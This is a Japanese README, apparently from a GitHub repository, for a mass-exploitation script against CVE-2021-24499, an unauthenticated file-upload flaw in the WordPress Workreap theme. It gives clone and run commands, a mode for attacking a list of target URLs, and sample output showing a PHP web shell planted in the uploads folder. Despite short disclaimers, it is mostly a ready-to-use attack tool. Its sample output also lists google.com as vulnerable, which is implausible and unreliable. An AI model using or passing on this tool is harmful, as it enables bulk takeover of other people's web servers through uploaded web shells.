
WordPressテーマ Workreap 2.2.2 - 認証なしアップロードによるリモートコード実行
WordPress Theme Workreap 2.2.2 - 認証不要のファイルアップロードによるリモートコード実行
WordPress WorkreapテーマのCVE-2021-24499脆弱性を対象とした、強力で正確な大量悪用ツールです。このエクスプロイトは認証不要のファイルアップロードを可能にし、リモートコード実行(RCE)につながる可能性があります。
CVE-2021-24499は、WordPress Workreapテーマ(バージョン2.2.2以下)の重大な脆弱性で、認証されていないユーザーがworkreap_award_temp_file_uploader AJAXアクションを介してPHPファイルを含む任意のファイルをアップロードできるようにします。これにより、ターゲットサーバー上でリモートコード実行(RCE)が発生する可能性があります。
影響を受けるバージョン: 2.2.2を含むすべてのバージョン
CVSSスコア: 重大
curlコマンドラインツールopts.phpまたはshell.phpファイル(PHPウェブシェル)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.phpまたはshell.php(PHPウェブシェル)があることを確認してください単一ターゲット:
./exploit.sh -u http://target.com
複数ターゲット(ファイルから):
./exploit.sh -l targets.txt
ヘルプを表示:
./exploit.sh --help
| オプション | 説明 |
|---|---|
-u URL | 単一のターゲットURLを攻撃 |
-l FILE | ファイルから複数のターゲットを攻撃(1行に1つのURL) |
--help | ヘルプメニューを表示 |
1行に1つのURLを記述したテキストファイルを作成:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
このツールは教育的かつ許可されたテスト目的のみで提供されています。
このツールを使用することにより、正当なセキュリティテストおよび研究目的でのみ使用することに同意したものとみなされます。
作者: Jay Maranatha Hutajulu
このプロジェクトはMITライセンスの下で提供されています。詳細はLICENSEファイルを参照してください。
コントリビューション、問題報告、機能リクエストを歓迎します!遠慮なくissuesページをご確認ください。
このツールが役に立ったと思われたら、スター⭐を付けていただけると幸いです。
注意: セキュリティツールは常に責任を持って倫理的に使用してください。ハッピーハッキング!🚀